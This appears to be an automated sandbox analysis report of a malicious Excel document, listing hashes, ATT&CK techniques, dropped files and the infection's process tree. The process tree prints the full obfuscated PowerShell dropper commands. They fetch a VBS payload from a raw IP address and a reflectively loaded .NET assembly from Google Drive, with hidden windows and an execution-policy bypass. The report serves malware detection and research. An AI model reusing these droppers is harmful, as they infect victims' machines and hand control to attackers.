5e3fade0bb906fa990c5a6fccff48bdd14bf2d9cb52971f719b4ab5e5829fba2

Analysis

max time kernel
121s
max time network
125s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
27-10-2024 01:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c0e0842868faf1c6faa5caa5ae3db3064a1aea9814d3f22d67f3891c798ecd2b.xls
Size

1.0MB
MD5

a8e1c0126304e8d65c0a30873dc3d830
SHA1

a0b52e51d227a126c1bc85b057482a58b028ed88
SHA256

c0e0842868faf1c6faa5caa5ae3db3064a1aea9814d3f22d67f3891c798ecd2b
SHA512

87ec45bd80a0b29c11900946b892134a636b6806ca87b9bce7fbbc52bfbd680436f73c61b6ce51a661b2b179cdf18577617267b68aab43a5f0f425e217f443cd
SSDEEP

12288:0mzHJEyfN1YpuBPP39sZEVD3DERnLRmF8DCO9auag9riz5+w3Z6VM0f3kobnY1lR:Hhfgp83hVbARM8+wa5ESZUF8nN

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
10	2764	mshta.exe
11	2764	mshta.exe
13	2504	pOweRSheLl.ExE
15	2284	powershell.exe
17	2284	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1488	powershell.exe
2284	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2504	pOweRSheLl.ExE
2936	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
14	drive.google.com
15	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	pOweRSheLl.ExE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOweRSheLl.ExE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2132	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2504	pOweRSheLl.ExE
2936	powershell.exe
2504	pOweRSheLl.ExE
2504	pOweRSheLl.ExE
1488	powershell.exe
2284	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2504	pOweRSheLl.ExE
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	1488	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2132	EXCEL.EXE
2132	EXCEL.EXE
2132	EXCEL.EXE
2132	EXCEL.EXE
2132	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2764 wrote to memory of 2504	2764	mshta.exe	33
PID 2764 wrote to memory of 2504	2764	mshta.exe	33
PID 2764 wrote to memory of 2504	2764	mshta.exe	33
PID 2764 wrote to memory of 2504	2764	mshta.exe	33
PID 2504 wrote to memory of 2936	2504	pOweRSheLl.ExE	35
PID 2504 wrote to memory of 2936	2504	pOweRSheLl.ExE	35
PID 2504 wrote to memory of 2936	2504	pOweRSheLl.ExE	35
PID 2504 wrote to memory of 2936	2504	pOweRSheLl.ExE	35
PID 2504 wrote to memory of 2924	2504	pOweRSheLl.ExE	36
PID 2504 wrote to memory of 2924	2504	pOweRSheLl.ExE	36
PID 2504 wrote to memory of 2924	2504	pOweRSheLl.ExE	36
PID 2504 wrote to memory of 2924	2504	pOweRSheLl.ExE	36
PID 2924 wrote to memory of 2880	2924	csc.exe	37
PID 2924 wrote to memory of 2880	2924	csc.exe	37
PID 2924 wrote to memory of 2880	2924	csc.exe	37
PID 2924 wrote to memory of 2880	2924	csc.exe	37
PID 2504 wrote to memory of 996	2504	pOweRSheLl.ExE	38
PID 2504 wrote to memory of 996	2504	pOweRSheLl.ExE	38
PID 2504 wrote to memory of 996	2504	pOweRSheLl.ExE	38
PID 2504 wrote to memory of 996	2504	pOweRSheLl.ExE	38
PID 996 wrote to memory of 1488	996	WScript.exe	39
PID 996 wrote to memory of 1488	996	WScript.exe	39
PID 996 wrote to memory of 1488	996	WScript.exe	39
PID 996 wrote to memory of 1488	996	WScript.exe	39
PID 1488 wrote to memory of 2284	1488	powershell.exe	41
PID 1488 wrote to memory of 2284	1488	powershell.exe	41
PID 1488 wrote to memory of 2284	1488	powershell.exe	41
PID 1488 wrote to memory of 2284	1488	powershell.exe	41

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\c0e0842868faf1c6faa5caa5ae3db3064a1aea9814d3f22d67f3891c798ecd2b.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2132

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2764
- C:\Windows\SysWOW64\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE
  "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2504
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2936
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wo1o4vrr.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2924
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8853.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8852.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2880
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:996
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1488
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2284

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
6fba50e6d96d9702e93bfb5e33b2544b

SHA1
d5170166428df1991f9afbb577f4cb0b725afb1e

SHA256
c1d5a351766a008309bfcf293fa9b233f3aa02e0e6c0b47586f3855b6d336ef1

SHA512
b7863db70fd9fc42b5a61488d88a17ddee3c8cc9bf6c8cd8e0b70478709a0a96cf76e57a5a58ff175ad9e26194e4d12a845daf9a5531ec64b4d10c894688ab75

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
6e4ab5bfddfdc512ab1fde9af6d47c10

SHA1
815b458a935b5e3adb8993b34ea3882dc2108bf5

SHA256
95db5c772afcec0bca721ffbc4d74f1e0b37f43abac50079adb456b613b01c43

SHA512
a8a8a60bef4794cdd6bcba8f94646c308aa2e64190ced84da4bdc0fcc3141a1aaf4a8163d2daec2fa9baa336f5632e09db0fde5c460732ea59c1006ef457066c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
f829cd3b9ccab4fee09618e70490e54e

SHA1
6e2e22d5912ea4a1c074ebe8d9fc3392e3679528

SHA256
bfffd5f65f4269ffa1452aa16085d7ac3852c12210d3461dfd9b6a5ceea52118

SHA512
9e72705dc01a99bf909594c8024cfee5e7e435cfc5c5e24562f7e85663ebd00b824514a0c374fd904e77483885a50a7362e0e5336209c1397d0f8161af49eeab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\greatthingswithgoodnewsgivenbygodthingsgreat[1].hta

Filesize
8KB

MD5
7e03ce8476337538cce2cccba946dfd2

SHA1
3cd8b05d8be3e1d518069a6acd8e4dbbc857240e

SHA256
03f691a8f268670249f250d4ace8fa3e78fe7a79964ffbf601a2d74adde9f072

SHA512
3cf63555f7a4b620862458701d2272048517a7660ef95a8304a6ab43f452ecaa6c51cbd1b347e896c48edd2390015a7233160babc128bd129d944b69284f854e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab7D99.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8853.tmp

Filesize
1KB

MD5
4685108e57a79d89640818f7b0a21e4b

SHA1
dad9820595b7043d2024e3c5ee6b311656b586ea

SHA256
a11e0ab17c3e24a1ab2366d87d990cbb369c7d55c8c9dcbde6441bdd2ffa9419

SHA512
2360bd48673a38bf1c929e8c95abbf5ddbb800f32839d63a40e62d6cabde37d3624f0fd2890b03324d4c00fbab07e8f25be943d976c2ebaae94ba563e952c388

Download Submit
C:\Users\Admin\AppData\Local\Temp\wo1o4vrr.dll

Filesize
3KB

MD5
20c8fcff41daaee6fef77c57c60e0241

SHA1
3e1984ab153aaa3e3f0212678d151d7507f520ac

SHA256
b48e343b10ba7970f5674b2cd7e871e448764199346f8327854b2726518cf15f

SHA512
afc15bfae9dcef11be1e5221a23704fb8b9671865c416b10bea07d1b4cba14dc8263581074c4a4c4cc0faefc60e37a973024792bec9e216b6bb4ce8226cbf392

Download Submit
C:\Users\Admin\AppData\Local\Temp\wo1o4vrr.pdb

Filesize
7KB

MD5
aad41edfa622011fe9ee612d01eead22

SHA1
c4ee17136682e9a4e97864592d540553ed29e2e5

SHA256
959d3a765934f05fd8d22b394ff89bc1d723eb1244751a72085ccb6e7658687a

SHA512
3edde16546eb0dfcfbc7fe5358de5f8d9c1c5e412debdbaab886c19e30f8d45499250822d6da2341d5695f58761e8c62b585b424e31dba9b163007d542fa8238

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
fe3bf31d078885cda5ccd568d94469ee

SHA1
99b2fdbe8b883b38d6967259c02aaf7398cf8819

SHA256
95d833ccfaf19746bca242efec5e4b163d472ce35eea753afb4692556b466810

SHA512
58e53572378045586b9ec56b2fd5d395641f25f03e8bce131d2c48915d27e5d3f68b27e7c230557fca44da195501ffedd5056e4b0efdb89d33a670604abb20ef

Download Submit
C:\Users\Admin\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS

Filesize
136KB

MD5
74339d80989d10693dbc1115d1cf3eb4

SHA1
bd9b4dea8d68db3261e4eb23a9dfe857d0f9ee44

SHA256
a73c93345d81b888fe37255abc545dcdb3470b4f0bd59654e4b398c87be6b64d

SHA512
4befe3383549fb2048e9617430b284f8b62cce46fa4998a62122e7ed4349357ad9b11c0a0819c40467ce3b2ca7648222b1714e3745a4e74f50fae3d569caa1ba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC8852.tmp

Filesize
652B

MD5
fcacde1180eb6fbcf9b57266b708a010

SHA1
cb8a90cb267f6dc889e3450013d36fdb25dfe9d9

SHA256
47cc07229cdc9948c802d4d8d2efbaff02cb23353bc3b010727ca4829c2a4b8b

SHA512
2c438cb9bb680704051a9a717b684cf6333e81607972494bdfa632e396a2af294e4e32a63d900b6b291680782a6910bed44ba5072bd4a616f3fddb0706944be0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wo1o4vrr.0.cs

Filesize
480B

MD5
ce22e90871744b25a04ac8c5691f49cc

SHA1
bc0a93c1fe61e00daa34774994b638d19f735228

SHA256
3b955e3c74519870aacef3876b7cdc4420f0b77d2d09937b7385e8b578f26546

SHA512
5f13af44f2219d050d04658808b287bcb9c948765a1aca148ab148e0981087ab22d6b5af9fa74360b41a7322b9009858cf25e480a579b16fc8bd62c9b72d0f88

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wo1o4vrr.cmdline

Filesize
309B

MD5
9d42d074a44bdceed8904202e9dc8fe4

SHA1
0a156bf7877b43fea779e32b8e25fa0ea0dbda9e

SHA256
a1aa75fad2573f4fa9b838106cdf9465550f5007b9611e3fc88bb3ed69598403

SHA512
56e94323fbe8ebde9af638a3ecabceb0c26da40620c90d69a8d0daeb79b22b8affebbfd9d3184d49e32e3b31ce04942774919677280ccc79121ed0126944d393

Download Submit
memory/2132-1-0x000000007217D000-0x0000000072188000-memory.dmp

Filesize
44KB

Download
memory/2132-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2132-19-0x0000000002DB0000-0x0000000002DB2000-memory.dmp

Filesize
8KB

Download
memory/2132-77-0x000000007217D000-0x0000000072188000-memory.dmp

Filesize
44KB

Download
memory/2764-18-0x0000000000B90000-0x0000000000B92000-memory.dmp

Filesize
8KB

Download